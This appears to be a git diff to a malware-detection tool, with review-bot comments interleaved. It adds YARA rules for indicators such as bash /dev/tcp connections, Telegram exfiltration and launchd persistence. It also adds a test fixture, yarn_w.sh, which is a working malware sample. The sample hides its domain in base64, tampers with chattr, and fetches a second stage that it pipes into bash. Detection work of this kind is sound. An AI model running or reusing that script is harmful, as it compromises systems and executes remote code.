diff --git a/pkg/bincapz/render.go b/pkg/bincapz/render.go
index ebf2989a6..de50e1471 100644
--- a/pkg/bincapz/render.go
+++ b/pkg/bincapz/render.go
@@ -90,8 +90,8 @@ func RenderTable(fr *FileReport, w io.Writer) {
 if width > 110 {
 valWidth += (width - 110)
 }
- if valWidth > 60 {
- valWidth = 60
+ if valWidth > 65 {
+ valWidth = 65
 }
 klog.Infof("terminal width: %d / val width: %d", width, valWidth)
diff --git a/rules/archives/zip.yara b/rules/archives/zip.yara
index b834903cb..96356757e 100644
--- a/rules/archives/zip.yara
+++ b/rules/archives/zip.yara
@@ -5,6 +5,8 @@ rule zip : notable {
 strings:
 $ref = "ZIP64" fullword
 $ref2 = "archive/zip"
+ $ref3 = "zip_writer" fullword
+ $ref4 = "ZIP archive" fullword
 condition:
 any of them
 }
diff --git a/rules/combo/exfil/osascript_http_zipper.yara b/rules/combo/exfil/osascript_http_zipper.yara
new file mode 100644
index 000000000..37943ef98
--- /dev/null
+++ b/rules/combo/exfil/osascript_http_zipper.yara
@@ -0,0 +1,13 @@
+
+rule osascript_http_zipper : suspicious {
+ meta:
+ description = "runs AppleScript, makes HTTP requests, zips files"
+ strings:
+ $ref = "osascript" fullword
+ $readdir = "readdir" fullword
+ $socket = "socket" fullword
+ $http = "HTTP" fullword
+ $zip = "zip_writer"
+ condition:
+ all of them
+}
diff --git a/rules/databases/mysql.yara b/rules/databases/mysql.yara
new file mode 100644
index 000000000..9e68a2f04
--- /dev/null
+++ b/rules/databases/mysql.yara
@@ -0,0 +1,9 @@
+
+rule mysql : notable {
+ meta:
+ description = "accesses MySQL databases"
+ strings:
+ $ref = "mysql" fullword
+ condition:
+ $ref
+}
\ No newline at end of file
diff --git a/rules/databases/postgresql.yara b/rules/databases/postgresql.yara
new file mode 100644
index 000000000..1cbc0cb0e
--- /dev/null
+++ b/rules/databases/postgresql.yara
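Review bot: `valWidth = 65` is a second bare literal whose meaning depends on the `110` threshold two lines above it, and the two now drift independently; a named pair such as `const maxValWidth = 65` beside the existing width threshold would document the relationship and make later tuning a one-line change. RenderTable starts before and continues after this hunk, so the declaration site for such a constant is outside the visible lines.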
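Review bot: `$zip = "zip_writer"` is the only string in osascript_http_zipper without `fullword`, while the four strings above it all carry the modifier; if the omission is deliberate (to also catch longer identifiers that start with `zip_writer`), a short comment saying so would help, otherwise `$zip = "zip_writer" fullword` keeps the rule consistent. The `meta` block has only a description; the repository's other suspicious rules (for example activity_monitor_checker in rules/evasion/process-check.yara) carry `hash_*` entries, so a `hash_<year>_<family> = "<sha256 placeholder>"` line for the sample that motivated this combination would make it reproducible.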
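Review bot: mysql.yara ends without a trailing newline (`\ No newline at end of file`), as do postgresql.yara, sqlite.yara, http-auth.yara, decryptor.yara, dropper.yara, locked-files.yara, server_address.yara and send.yara in this commit; YARA tolerates it, but it turns every later one-line edit to these files into a two-line diff. Several of the new files also open with a blank line before `rule` (this one, postgresql.yara, osascript_http_zipper.yara, bash_tcp.yara, sysinfo_http.yara, detach_daemonize.yara), which the older rules in the same directories do not. An editor or pre-commit setting for the rules tree would settle both.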
@@ -0,0 +1,10 @@
+
+rule postgresql : notable {
+ meta:
+ description = "accesses PostgreSQL databases"
+ strings:
+ $ref = "postgresql" fullword
+ $ref2 = "github.com/go-pg" fullword
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/databases/sqlite.yara b/rules/databases/sqlite.yara
new file mode 100644
index 000000000..6993c8a95
--- /dev/null
+++ b/rules/databases/sqlite.yara
@@ -0,0 +1,9 @@
+rule sqlite : notable {
+ meta:
+ description = "accesses SQLite databases"
+ strings:
+ $ref = "sqlite" fullword
+ $ref3 = "sqlite3" fullword
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/evasion/bash_tcp.yara b/rules/evasion/bash_tcp.yara
new file mode 100644
index 000000000..6003513ce
--- /dev/null
+++ b/rules/evasion/bash_tcp.yara
@@ -0,0 +1,9 @@
+
+rule bash_tcp : suspicious {
+ meta:
+ description = "sends data via /dev/tcp (bash)"
+ strings:
+ $ref = /[\w \-\<]{0,32}>"{0,1}\/dev\/tcp\/[\$\{\/\:\-\w\"]{0,32}/
+ condition:
+ $ref
+}
diff --git a/rules/evasion/content-length-0.yara b/rules/evasion/content-length-0.yara
new file mode 100644
index 000000000..a63a9dfac
--- /dev/null
+++ b/rules/evasion/content-length-0.yara
@@ -0,0 +1,10 @@
+rule content_length_0 : suspicious {
+ meta:
+ description = "Sets HTTP content length to zero"
+ strings:
+ $ref = "Content-Length: 0"
+ condition:
+ $ref
+}
+
+
diff --git a/rules/evasion/process-check.yara b/rules/evasion/process-check.yara
index cb474ad00..0d8795313 100644
--- a/rules/evasion/process-check.yara
+++ b/rules/evasion/process-check.yara
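Review bot: The leading `[\w \-\<]{0,32}` in bash_tcp's `$ref` can match the empty string, so for a presence test it adds nothing: every file that matches the full pattern also matches `/>"?\/dev\/tcp\/[\$\{\/\:\-\w\"]{0,32}/` and vice versa, and the shorter form is easier to read (`"{0,1}` is just `"?`). The pattern also requires `>` to sit directly before the optional quote, so a redirect written with a space between `>` and the path is not covered; `>\s?"?` closes that gap, or the rule could match `\/dev\/tcp\/` on its own if the redirect operator is not essential to the verdict. The description says "sends data", but the same device path is used to read — the new testdata/Linux/yarn_w.sh sample opens it with `exec 3<>"/dev/tcp/..."` to download — so `description = "opens a TCP connection via /dev/tcp (bash)"` describes what the string actually proves.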
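Review bot: `"Content-Length: 0"` occurs in ordinary HTTP client and server code paths — I believe Go's net/http emits this exact header line for body-less POST/PUT requests — so as a lone `suspicious` string content_length_0 is likely to fire on most statically linked HTTP clients rather than on beaconing specifically. If the target is the empty-POST beacon pattern, combining it with a method or host indicator in the condition, or lowering the tag to `notable`, would keep the signal meaningful. Two style nits in the same hunk: `description = "Sets HTTP content length to zero"` is the only capitalised description in this commit's rules, and the file gains two trailing blank lines after the closing brace.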
@@ -3,7 +3,9 @@ rule activity_monitor_checker : suspicious {
 hash_2020_BirdMiner_tonsillith = "9f8dba1cea7c8a4d7701a6a3e2d826202ba7e00e30e9c836c734ad6842b8cb5e"
 hash_2020_BirdMiner_tormina = "4179cdef4de0eef44039e9d03d42b3aeca06df533be74fc65f5235b21c9f0fb1"
 strings:
- $pgrep = /pgrep [\-\w]{0,4}"Activity Monitor"/
+ $ps = "ps" fullword
+ $pgrep = "pgrep" fullword
+ $am = "Activity Monitor" fullword
 condition:
- any of them
+ $am and any of ($p*)
 }
diff --git a/rules/exfil/sysinfo_http.yara b/rules/exfil/sysinfo_http.yara
new file mode 100644
index 000000000..6b5ea8ca6
--- /dev/null
+++ b/rules/exfil/sysinfo_http.yara
@@ -0,0 +1,10 @@
+
+rule sysinfo_http : suspicious {
+ meta:
+ description = "sends host information via HTTP GET variables"
+ strings:
+ $ref = "&hostname="
+ $ref2 = "&uname="
+ condition:
+ any of them
+}
diff --git a/rules/exfil/telegram.yara b/rules/exfil/telegram.yara
index fd8b853d8..df3bcbf64 100644
--- a/rules/exfil/telegram.yara
+++ b/rules/exfil/telegram.yara
@@ -4,8 +4,10 @@ rule telegram_bot : suspicious {
 ref = "https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_suspicious.yar#L676"
 strings:
 $s1 = "api.telegram.org"
+ $s1_b64 = "api.telegram.org" base64
 $s3 = "Content-Disposition: form-data; name=\""
 $p1 = "/sendMessage"
+ $p1_b64 = "/sendMessage" base64
 $p2 = "/sendDocument"
 $p4 = "/sendLocation"
 condition:
diff --git a/rules/fs/file-open.yara b/rules/fs/file-open.yara
index 2523cb0bf..9c62c02c1 100644
--- a/rules/fs/file-open.yara
+++ b/rules/fs/file-open.yara
@@ -6,6 +6,7 @@ rule file_open : harmless {
 $fopen = "fopen" fullword
 $fopen64 = "fopen64" fullword
 $fclose = "fclose" fullword
+ $file_open = "file open failed"
 condition:
 any of them
 }
diff --git a/rules/fs/file-sync.yara b/rules/fs/file-sync.yara
index cc1328405..14bf6fe85 100644
--- a/rules/fs/file-sync.yara
+++ b/rules/fs/file-sync.yara
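Review bot: `$ps = "ps" fullword` is a two-byte token that often appears as a stand-alone word in unrelated binaries (format strings, PostScript references, short identifiers), so in practice the new condition `$am and any of ($p*)` tends to reduce to `$am` alone — a file that mentions "Activity Monitor" as a word will frequently satisfy `$p*` through `$ps` somewhere else in the image. The removed regex kept `pgrep` adjacent to the quoted process name; if wider coverage is the goal, keeping the two parts adjacent in a pattern (for instance `$pgrep = /pgrep [\-\w ]{0,8}"?Activity Monitor"?/` plus an equivalent `ps`/`grep` form) preserves the original specificity. The `hash_2020_*` metadata above the hunk still documents the old behaviour, so a note that the strings may now be anywhere in the file would keep it honest.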
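Review bot: The condition that decides whether `$s1_b64` and `$p1_b64` ever count ends outside this hunk (the hunk stops at `condition:`); if it refers to `$s1` by name rather than `any of ($s1*)`, the base64 form of the API host never contributes and that addition is dead. `$p1_b64` is covered automatically only if the condition already uses a `$p*` wildcard. Worth confirming against the lines below, and a one-line `meta` note such as `note = "base64 variants added for obfuscated bots"` would explain why only these two strings got the modifier.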
@@ -6,6 +6,7 @@ rule fsync : harmless {
 syscall = "fsync"
 strings:
 $ref = "fsync" fullword
+ $ref2 = "syscall.Fsync" fullword
 condition:
 any of them
 }
diff --git a/rules/kernel/uname-get.yara b/rules/kernel/uname-get.yara
index 0a73caba4..112aad417 100644
--- a/rules/kernel/uname-get.yara
+++ b/rules/kernel/uname-get.yara
@@ -6,6 +6,7 @@ rule uname : notable {
 syscall = "sysctl"
 strings:
 $uname = "uname" fullword
+ $uname2 = "syscall.Uname" fullword
 condition:
 any of them
 }
diff --git a/rules/malware/family/stealthworker.yara b/rules/malware/family/stealthworker.yara
new file mode 100644
index 000000000..3414af673
--- /dev/null
+++ b/rules/malware/family/stealthworker.yara
@@ -0,0 +1,8 @@
+rule stealthworker : critical {
+ meta:
+ description = "StealthWorker Worm/Trojan"
+ strings:
+ $ref = "StealthWorker/Worker"
+ condition:
+ all of them
+}
diff --git a/rules/net/ftp.yara b/rules/net/ftp.yara
new file mode 100644
index 000000000..38c373770
--- /dev/null
+++ b/rules/net/ftp.yara
@@ -0,0 +1,9 @@
+rule ftp {
+ meta:
+ description = "File Transfer Protocol (FTP)"
+ strings:
+ $ref = "ftp.Dial" fullword
+ $ref2 = "EPSV" fullword
+ condition:
+ any of them
+}
diff --git a/rules/net/http-auth.yara b/rules/net/http-auth.yara
new file mode 100644
index 000000000..932bdde86
--- /dev/null
+++ b/rules/net/http-auth.yara
@@ -0,0 +1,10 @@
+rule http_auth {
+ meta:
+ description = "makes HTTP requests with basic authentication"
+ strings:
+ $ref = "Www-Authenticate"
+ $ref2 = "WWW-Authenticate"
+ $ref3 = "www-authenticate"
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/net/sendfile.yara b/rules/net/sendfile.yara
index a2ad6d6b8..7279b8504 100644
--- a/rules/net/sendfile.yara
+++ b/rules/net/sendfile.yara
@@ -5,6 +5,7 @@ rule sendfile {
 ref = "https://man7.org/linux/man-pages/man2/sendfile.2.html"
 strings:
 $ref = "sendfile" fullword
+ $ref2 = "syscall.Sendfile" fullword
 condition:
 any of them
 }
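Review bot: The four Go syscall-wrapper strings added in this commit are named four different ways — `$ref2` here and in sendfile.yara, `$uname2` in uname-get.yara, `$go` in send.yara — although they all mean the same thing, the Go `syscall.X` symbol for the call the rule already tracks. One convention, for example `$go_fsync`, `$go_uname`, `$go_sendfile` and `$go_kill`, would make the origin obvious wherever string identifiers are shown and keeps future Go-symbol additions grep-able.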
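Review bot: `condition: all of them` in stealthworker spans a single string and reads as if more indicators were planned; `$ref` states the intent directly, and a `critical` verdict resting on one path-like literal is brittle, so a second indicator from the same sample would make the rule sturdier. The `meta` block carries only a description; family rules in this repository cite samples (see the `hash_2020_*` entries in rules/evasion/process-check.yara), so add `hash_<year>_stealthworker = "<sha256 placeholder>"` and, if one exists, a `ref = "<analysis link placeholder>"` line for the write-up the string came from.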
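Review bot: `rule ftp {` and `rule http_auth {` carry no severity tag, whereas every other rule this commit adds is tagged `harmless`, `notable`, `suspicious` or `critical`. The pre-existing `rule sendfile {` in the same directory is untagged too, so there may be an intended default, but if the renderer derives its risk column from the tag an untagged rule could surface inconsistently; tagging them explicitly (`rule ftp : notable {` would match the neighbouring rules in rules/net) removes the ambiguity either way.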
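Review bot: http_auth's description says basic authentication, but `WWW-Authenticate` is the server-side challenge header for every scheme (Basic, Digest, Bearer, NTLM) and is present in most HTTP client and server libraries, so the three strings establish neither "makes requests" nor "basic". A client that actually sends Basic credentials carries `Authorization: Basic`, and a server that demands them carries `Basic realm=`; matching on those would fit the stated description, or the description should be relaxed to `"references HTTP authentication headers"` to match what is actually detected.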
diff --git a/rules/net/url-request.yara b/rules/net/url-request.yara
index 9ef684c83..63fa43b14 100644
--- a/rules/net/url-request.yara
+++ b/rules/net/url-request.yara
@@ -1,8 +1,10 @@
 rule requests_urls : notable {
 meta:
- description = "Makes network requests using a URL"
+ description = "requests resources via URL"
 strings:
 $ref = "NSMutableURLRequest"
+ $ref2 = "import requests"
+ $ref3 = "net/url"
 condition:
 any of them
 }
diff --git a/rules/persistence/macos/launchd-manipulation.yara b/rules/persistence/macos/launchd-manipulation.yara
index 916e9aafd..3bd73cdb7 100644
--- a/rules/persistence/macos/launchd-manipulation.yara
+++ b/rules/persistence/macos/launchd-manipulation.yara
@@ -5,7 +5,8 @@ rule launchctl : notable {
 platforms = "darwin"
 strings:
 $ref = "LaunchAgents" fullword
+ $ref2 = "launchctl"
 condition:
- any of them
+ all of them
 }
diff --git a/rules/process/detach_daemonize.yara b/rules/process/detach_daemonize.yara
index e69de29bb..61eca3b97 100644
--- a/rules/process/detach_daemonize.yara
+++ b/rules/process/detach_daemonize.yara
@@ -0,0 +1,10 @@
+
+rule detach : suspicious {
+ meta:
+ description = "process detaches and daemonizes"
+ strings:
+ $ref = "xdaemon"
+ $ref2 = "go-daemon"
+ condition:
+ any of them
+}
diff --git a/rules/ref/site/download.yara b/rules/ref/site/download.yara
index e5f7628f3..8cedc2f26 100644
--- a/rules/ref/site/download.yara
+++ b/rules/ref/site/download.yara
@@ -13,6 +13,7 @@ rule download_sites : suspicious {
 $d_rentry = "rentry.co"
 $d_penyacom = "penyacom"
 $d_controlc = "controlc.com"
+ $d_anotepad = "anotepad.com"
 $d_privnote = "privnote.com"
 $d_hushnote = "hushnote"
 $not_mozilla = "download.mozilla.org"
diff --git a/rules/ref/words/decryptor.yara b/rules/ref/words/decryptor.yara
new file mode 100644
index 000000000..7b2e23271
--- /dev/null
+++ b/rules/ref/words/decryptor.yara
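Review bot: `$ref3 = "net/url"` is the import path of Go's URL package, which net/http itself depends on, so after this hunk essentially every Go binary with HTTP support is reported `notable` by requests_urls; `"import requests"` likewise matches Python source text, not compiled artefacts, so it mostly applies to scripts. If the intent is "this program parses or builds URLs", the Go symbols `net/url.Parse` or `net/url.(*URL).String` are narrower than the bare package path; otherwise the tag should reflect how common the match now is. Since the description was rewritten anyway, a `meta` note that `$ref2` targets Python source would save the next reader the same question.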
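Review bot: Switching launchctl's condition to `all of them` makes the `launchctl` string mandatory, so an installer that only drops a plist under `LaunchAgents` via the filesystem no longer matches this rule; if that tightening is intended, the description (outside the hunk) should say the rule means "invokes launchctl against LaunchAgents", otherwise keep `any of them` and give the launchctl case its own rule. `$ref2 = "launchctl"` is also the only string in the rule without `fullword`, unlike `$ref` just above it; `$ref2 = "launchctl" fullword` keeps the two consistent. The hunk header counts seven old lines but six are visible here, so one context line may have been lost in rendering — the file itself should be checked.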
@@ -0,0 +1,8 @@
+rule decryptor : notable {
+ meta:
+ description = "References 'decryptor'"
+ strings:
+ $ref = "decryptor"
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/ref/words/dropper.yara b/rules/ref/words/dropper.yara
new file mode 100644
index 000000000..7719542f2
--- /dev/null
+++ b/rules/ref/words/dropper.yara
@@ -0,0 +1,9 @@
+rule decryptor : notable {
+ meta:
+ description = "References 'dropper'"
+ strings:
+ $ref = "dropper" fullword
+ $ref2 = "Dropper" fullword
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/ref/words/locked-files.yara b/rules/ref/words/locked-files.yara
new file mode 100644
index 000000000..ac4eb0b77
--- /dev/null
+++ b/rules/ref/words/locked-files.yara
@@ -0,0 +1,9 @@
+rule lockedFiles : suspicious {
+ meta:
+ description = "References 'locked files'"
+ strings:
+ $ref = "lockedFiles"
+ $ref2 = "lockedFileNames"
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/ref/words/server_address.yara b/rules/ref/words/server_address.yara
new file mode 100644
index 000000000..bac130353
--- /dev/null
+++ b/rules/ref/words/server_address.yara
@@ -0,0 +1,9 @@
+rule server_address : suspicious {
+ meta:
+ description = "references a 'server address', possible C2 client"
+ strings:
+ $underscores = /\w{0,32}server_addr\w{0,32}/
+ $mixed = /\w{0,32}serverAddr\w{0,32}/
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/secrets/htpasswd.yara b/rules/secrets/htpasswd.yara
new file mode 100644
index 000000000..bd177bb4c
--- /dev/null
+++ b/rules/secrets/htpasswd.yara
@@ -0,0 +1,9 @@
+rule htpasswd : notable {
+ meta:
+ description = "Access .htpasswd files"
+ strings:
+ $ref = ".htpasswd"
+ $ref2 = "Htpasswd"
+ condition:
+ any of them
+}
diff --git a/rules/signal/send.yara b/rules/signal/send.yara
index 464bf944e..a5fc41fd5 100644
--- a/rules/signal/send.yara
+++ b/rules/signal/send.yara
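Review bot: dropper.yara declares `rule decryptor : notable {`, the same identifier as the rule in rules/ref/words/decryptor.yara added by this commit; YARA refuses a duplicated rule identifier within one namespace at compile time, so loading the rules directory with both files present fails rather than silently shadowing one of them. Change the first line of dropper.yara to `rule dropper : notable {` so the name matches the file and the description.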
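Review bot: `rule lockedFiles` is the only camelCase rule name in this commit; the rest use snake_case (`server_address`, `content_length_0`, `http_auth`, `osascript_http_zipper`). `rule locked_files : suspicious {` keeps the rule list uniform and makes the identifier visibly distinct from the `$ref = "lockedFiles"` literal it searches for.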
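Review bot: The `\w{0,32}` on both sides of `server_addr` and `serverAddr` can match the empty string, so the two regexes in server_address match exactly the set of files that the plain strings match; `$underscores = "server_addr"` and `$mixed = "serverAddr"` give the same verdicts and are cheaper to scan than regexes. If the surrounding word characters were meant to be retained for display in the report, say so in `meta`; otherwise drop the regex form.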
@@ -4,6 +4,7 @@ rule kill : harmless {
 pledge = "proc"
 strings:
 $kill = "_kill" fullword
+ $go = "syscall.Kill" fullword
 condition:
 any of them
 }
\ No newline at end of file
diff --git a/testdata/Linux/yarn_w.sh b/testdata/Linux/yarn_w.sh
new file mode 100644
index 000000000..121bf1397
--- /dev/null
+++ b/testdata/Linux/yarn_w.sh
@@ -0,0 +1,54 @@
+#!/bin/bash
+#variables
+lspath=$(which ls)
+domain=$(echo Yi45LTktOC5jb20K|base64 -d)
+mainurl=$(echo aHR0cDovL2IuOS05LTguY29tL2JyeXNqCg==|base64 -d)
+#mv command
+
+if [ -x /bin/chattr ];then
+ mv /bin/chattr /bin/zzhcht
+elif [ -x /usr/bin/chattr ];then
+ mv /usr/bin/chattr /usr/bin/zzhcht
+elif [ -x /usr/bin/zzhcht ];then
+ export CHATTR=/usr/bin/zzhcht
+elif [ -x /bin/zzhcht ];then
+ export CHATTR=/bin/zzhcht
+else
+ if [ $(command -v yum) ];then
+ yum -y reinstall e2fsprogs
+ if [ -x /bin/chattr ];then
+ mv /bin/chattr /bin/zzhcht
+ elif [ -x /usr/bin/chattr ];then
+ mv /usr/bin/chattr /usr/bin/zzhcht
+ fi
+ else
+ apt-get -y reinstall e2fsprogs
+ if [ -x /bin/chattr ];then
+ mv /bin/chattr /bin/zzhcht
+ elif [ -x /usr/bin/chattr ];then
+ mv /usr/bin/chattr /usr/bin/zzhcht
+ fi
+ fi
+fi
+if [ -x /bin/zzhcht ];then
+ export CHATTR=/bin/zzhcht && cp $lspath /bin/chattr && /bin/zzhcht +ia /bin/chattr
+elif [ -x /usr/bin/zzhcht ];then
+ export CHATTR=/usr/bin/zzhcht && cp $lspath /usr/bin/chattr && /usr/bin/zzhcht +ia /usr/bin/chattr
+else
+ export CHATTR=chattr
+fi
+
+
+vurl() {
+ IFS=/ read -r proto x host query <<<"$1"
+ exec 3<>"/dev/tcp/${host}/${PORT:-80}"
+ echo -en "GET /${query} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3
+ (while read -r l; do echo >&2 "$l"; [[ $l == $'\r' ]] && break; done && cat ) <&3
+ exec 3>&-
+}
+
+if [ "$(id -u)" = "0" ];then
+vurl ${mainurl}/d/ar.sh |bash
+else
+vurl ${mainurl}/d/ai.sh |bash
+fi
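Review bot: The new fixture is a live downloader script — its domain and base URL are base64-encoded on lines 4–5 and the `vurl` helper fetches a second stage and pipes it into `bash` — yet nothing in the diff records the sample's SHA-256 or origin, and no expected-output file for it appears alongside, so it is unclear which of the new rules it is meant to exercise (bash_tcp via `exec 3<>"/dev/tcp/..."`, the `chattr` renaming, or sysinfo_http). A short sibling metadata file or header comment with the hash, the source and the rule names expected to fire would make the fixture self-describing and let a test assert on it. Note for reviewers reading the rendered diff: the `+ia` on the two `zzhcht` lines is chattr's immutable/append-only flag, part of the line, not a diff marker.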